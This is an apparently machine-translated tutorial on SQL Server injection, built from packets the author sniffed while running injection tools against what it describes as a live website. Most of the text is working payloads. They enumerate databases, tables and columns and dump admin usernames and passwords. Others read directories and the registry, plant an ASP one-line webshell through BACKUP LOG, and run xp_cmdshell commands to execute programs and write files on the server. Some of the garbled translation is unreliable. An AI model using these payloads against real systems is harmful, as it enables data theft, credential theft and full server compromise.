Combat: Fully understand the SQL Server injection process

Want to understand the process and principle of SQL injection, online find some articles, speak are relatively superficial, but I know there are several domestic more commonly used injection tools, such as Domain3.5, NBSI3.0, ah D2.32, and pangolin, there are some foreign. Here, just a few to study the OK. The sniffer tool used this time is SNIFFX, which specializes in sniffing HTTP packets, is not powerful, but enough to use this activity. Originally wanted to use ethereal or wireshark, but inside the copy packet content is always put no transcoding of the 16 system also copied over, a little trouble. That means the two tools are not used skillfully.

"Querying database Information"

The local did not find a better injection of loopholes in the system, had to look for the internet, first with Domain3.5, run very well to find a SQLSERVER,SA permission of the injection point, point Domain3.5 above the "Start detection"

The following are the Domain3.5 HTTP packets:
News_show.asp?id=15618%20and%201=1
news_show.asp?id=15618%20and%201=2
News_show.asp?id=15618%20and%20exists%20 (select%20*%20from%20sysobjects)
News_show.asp?id=15618%20and%20char (124)%2buser%2bchar (124) =0
news_show.asp?id=15618;declare%20@a%20int–
News_show.asp?id=15618%20and%20char (124)%2bdb_name ()%2bchar (124) =0
News_show.asp?id=15618%20and%20is_srvrolemember (0x730079007300610064006d0069006e00) =1

The following are the NBSI3.0 HTTP packets:
News_show.asp?id=15618%20and%20user%2bchar (124) =0
News_show.asp?id=15618%20and%20system_user%2bchar (124) =0
News_show.asp?id=15618%20and%20cast (Is_srvrolemember (0x730079007300610064006d0069006e00)%20as%20nvarchar (1))% 2Bchar (124) =1
News_show.asp?id=15618%20and%20db_name ()%2bchar (124) =0
news_show.asp?id=15618;declare%20@a%20int–

Ah, D and Pangolin's packets are not listed here, they're all the same. The basic process is to use and 1=1 and 1=2 to determine whether to inject, General 1=1 return http (ok), 1=2 return HTTP (internal server error) to indicate injectable. Then and exists (SELECT * from sysobjects) to determine the type of database, sysobjects is the table that is used by SQL Server to store database information from each database. Each database in Access has its own table with Msysobjects. Once the SQL Server database is identified, and then with the system's own variable user,system_user and 0, System_user is the nchar type, and the user is the char type. 0 is definitely the int type, because different types of data cannot be directly compared in SQL Server, so it will be an error for SQL Server that opens the wrong message, and the sensitive information is also out of the way:

For an explanation of User,system_user, click on the link above to see the MSDN go.
Cast (Is_srvrolemember (0x730079007300610064006d0069006e00)%20as%20nvarchar (1))%2bchar (124) =1 medium cast ( the role is to explicitly convert an expression of one data type to an expression of another data type. CAST and CONVERT provide similar functionality. Is_srvrolemember indicates whether the SQL Server 2005 logon name is a member of the specified fixed server role, and the return value type is int,0 that is not a so-and-so member, and 1 represents. 0x730079007300610064006d0069006e00 is ' sysadmin ' of the 16 code, why to make into 16, I guess it may be afraid of Web site program filter point sysadmin keyword, if the page returns normally (200), Indicates that the user is sysadmin. A careful conversion of int to nvarchar (1) will also burst out of type conversion errors, which is the information the hacker needs. Db_name () returns the current database name.
;d eclare%20@a%20int– declare an int variable A, the effect I don't know.

The next task is to list the database names on the server: (assuming there are 16 databases on the server)

1. news_show.asp?id=15618 and (Select char (124)%2bcast (Count (1) as varchar (8000))%2bchar (124) from Master. sysdatabases)%3e0
2. news_show.asp?id=15618 and char (124) + (select top 1 cast ([name] as varchar (8000)) from (select top 1 dbid,name from [master] .. [sysdatabases] ORDER by [dbid]) T-ORDER BY [dbid] desc) >0
3. news_show.asp?id=15618 and char (124) + (select top 1 cast ([name] as varchar (8000)) from (select top 2 dbid,name from [master] .. [sysdatabases] ORDER by [dbid]) T-ORDER BY [dbid] desc) >0
4. news_show.asp?id=15618 and (select top 1 cast ([name] as nvarchar (4000))%2bchar (124) from (select Top Dbid,name from [Master]. [dbo]. [sysdatabases] Order BY [dbid]) T-ORDER BY [dbid] desc) >0

First list the characters above UrlEncode
%2b-' + '
%3e-' > '
%20-'
%2f-'/'

I can only say that these SQL statements are quite ingenious, and I'm beginning to wonder why I have to use subqueries. So I'm just using
Select top X dbid,name from [master]. [dbo]. [sysdatabases] ORDER by [dbid]
When x is 1, which is the first to return, there is no problem, the master is returned, but an error occurs when X is 2:
"The subquery returns more than one value." This is not allowed when the subquery follows =,!=, <, <=, >, >=, or the subquery is used as an expression. "
This is when the subquery plays a key role. And then you don't know what T is, and then you know that SQL Server subqueries must have an alias, T is the alias, and then the query's statement continues to be compared with the 0 error so that all the database names are burst.
The first select COUNT (1) returns the number of databases.

Next is to guess the table name, assuming that our current database is news, then first guess the number of tables in the database:
news_show.asp?id=15618 and (Select char (124) +cast (Count (1) as varchar (8000)) +char (124) from news. sysobjects where xtype=0x55) >0
Xtype is a datasheet type, 0x55 is a u, is a user table. See also here for a detailed explanation.

The table names are then listed separately:
news_show.asp?id=15618 and (select top 1 cast (name as nvarchar (4000)) from (select top 1 id,name from [news]. [sysobjects] Where xtype=0x55 ORDER BY ID (T ORDER BY id DESC) >0
It's OK to modify the second top 1 to 1 to the number of tables.

Then guess the name of the column, assuming that the table you want to guess is admin, you first get the unique ID that the table stores in sysobjects:
news_show.asp?id=15618 and (Select top 1 cast (id as nvarchar) from [news].[ DBO]. [sysobjects] where name= 'Admin') >0

Guess the table name, ID is the above query out the admin table ID.
news_show.asp?id=15618 and (select top 1 cast (name as nvarchar (4000)) +char (124) from (select top 1, colid,name from [news]. [dbo]. [Syscolumns] Where id = 1993058136 ORDER by Colid) T ORDER BY colid Desc) >0

Suppose the names of the listed ID,ADMINNAME,ADMINPASSWORD,ADMINPOWER,USERID,CT
Suppose you only guess the value of AdminName and AdminPassword.
First look at how many records are in the admin table:
news_show.asp?id=15618 and (Select Cast (Count ([adminname]) as nvarchar (4000)) +char (124) from [News]. [Admin] Where 1=1) >0

Returns the first column of data:
news_show.asp?id=15618 and (Select top 1 isNull ([adminname] as nvarchar (4000), char ()) char (124) IsNull (CAST ([ AdminPassword] as nvarchar (4000), char () from (Select top 1 [Adminname],[adminpassword] from [news]. [Admin] Where 1=1 ORDER BY [AdminName]) T ORDER BY [AdminName] Desc) >0
IsNull is to determine whether the data is empty, and return the value of the following char (32), which is the space-> '.
The back and so on.

"read Directory--xp_dirtree"

Drop off the table, and then create a table in the current database with three fields Subdirectory,depth,file
Board.asp?id=494;drop TABLE Techguru; CREATE TABLE Techguru (subdirectory nvarchar () null,depth tinyint null,[file] bit NULL) –

Clears the table's data and then stores the results of the Xp_dirtree stored procedure in the Techguru table, xp_dirtree the first parameter is the path, the second is the depth, the 0 o'clock infinite recursion, the third is the file type, the 1 is the folder and file, and the 0 is the only folder display.
Board.asp?id=494;delete techguru;insert Techguru exec master. Xp_dirtree ' C:\ ', 1,1–

Start a crawl file, directory name, add the number of the second top after each
board.asp?id=494 and (Select top 1 cast ([subdirectory] as nvarchar ())%2bchar (124)%2bcast ([file] as nvarchar (1))% 2Bchar (124) from (Select top 1 [subdirectory],[file] out Techguru order by [File],[subdirectory]) T-order BY [file] desc,[ Subdirectory] desc) =0

To remove a table:
Board.asp?id=494;drop TABLE techguru–

"Read Registry--xp_regread"

First, create a table with two columns of value and data
Board.asp?id=494;drop TABLE [Techguru]; CREATE TABLE [Techguru] (Value nvarchar (4000) null,data nvarchar (4000) NULL) –

Execute Xp_regread write the table you just created
Board.asp?id=494;delete [Techguru];insert [Techguru] exec master.dbo.xp_regread ' HKEY_LOCAL_MACHINE ', ' system\ Controlset001\services\w3svc\parameters\virtual Roots ', '/'-

Read it.
board.asp?id=494 and (Select top 1 cast ([data] as nvarchar (4000))%2bchar (124) to [Techguru] order BY [data] desc) =0

Delete Table
Board.asp?id=494;drop TABLE [techguru]–

"Upload webshell--backup log xx to disk"

BACKUP LOG, truncate 1, truncate 2
The first step: the establishment of a word Trojan table
Board.asp?id=494;create table [dbo]. [Shit_tmp] ([cmd] [image])-
Step Two: 0x7900690061006f006c007500 is the SQL code for 'yiaolu'
Board.asp?id=494;declare @a sysname,@s nvarchar (4000) Select @a=db_name
(), @s=0x7900690061006f006c007500 BACKUP LOG @a to disk = @s with init,no_truncate–
Step three: 0x3c25657865637574652872657175657374282261222929253e is the hex of <%execute (Request ("a"))%> .
Board.asp?id=494;insert into [shit_tmp] (CMD) values
(0x3c25657865637574652872657175657374282261222929253e) –
Step Fourth 0x64003a005c003100320033002e00610073007000 is the d:\123.asp SQL code
Board.asp?id=494;declare @a sysname,@s nvarchar (4000) Select @a=db_name
(), @s=0x64003a005c003100320033002e00610073007000 BACKUP log @a to disk=@s with init,no_truncate–
Fifth Step
Board.asp?id=494;drop Table [shit_tmp]–

"Execute command"

; CREATE TABLE [x_2894] ([id] int not NULL IDENTITY (1,1), [resulttxt] nvarchar (4000) NULL);
insert INTO [x_2894] (resulttxt) exec master.dbo.xp_cmdshell ' Dir c:\ ';
insert into [x_2894] values (' g_over '); exec master.dbo.sp_dropextendedproc ' xp_cmdshell '-

; use master DBCC ADDEXTENDEDPROC (' xp_cmdshell ', ' Xplog70.dll ')-

and (select top 1 case when resulttxt are Null then char (124) Else Resulttxt+char (124) End from (select top 1 id,resulttxt From [x_2894] order with [ID]) T order BY [ID] desc) >0

......

and (select top 1 case when resulttxt are Null then char (124) Else Resulttxt+char (124) End from (select Top Id,resulttxt From [x_2894] order with [ID]) T order BY [ID] desc) >0

G_over This is a specially inserted flag to be used as the end of the command echo.

;D ROP TABLE [x_2894];–

"local File Upload"

Let's say upload to server c:\down.vbs location

; exec master.dbo.xp_cmdshell ' del C:\down.vbs '-

; exec master.dbo.xp_cmdshell ' ecHo [deleteoncopy] >> C:\down.vbs '; exec master.dbo.sp_dropextendedproc ' xp_ Cmdshell ' –

; use master DBCC ADDEXTENDEDPROC (' xp_cmdshell ', ' Xplog70.dll ')-

; exec master.dbo.xp_cmdshell ' ecHo owner=administrator >> C:\down.vbs '; exec master.dbo.sp_dropextendedproc ' xp_ Cmdshell ' –

; use master DBCC ADDEXTENDEDPROC (' xp_cmdshell ', ' Xplog70.dll ')-

; exec master.dbo.xp_cmdshell ' ecHo personalized=5 >> C:\down.vbs '; exec master.dbo.sp_dropextendedproc ' xp_ Cmdshell ' –

; use master DBCC ADDEXTENDEDPROC (' xp_cmdshell ', ' Xplog70.dll ')-

exec master.dbo.xp_cmdshell ' ecHo personalizedname=my Documents >> C:\down.vbs '; exec master.dbo.sp_ Dropextendedproc ' xp_cmdshell '-

; use master DBCC ADDEXTENDEDPROC (' xp_cmdshell ', ' Xplog70.dll ')-

In summary, it is called xp_cmdshell to execute the write file of the echo sentence.

This analysis is an ending, but there are mysql,access,oracle,db2,infomix ... waiting to be explored.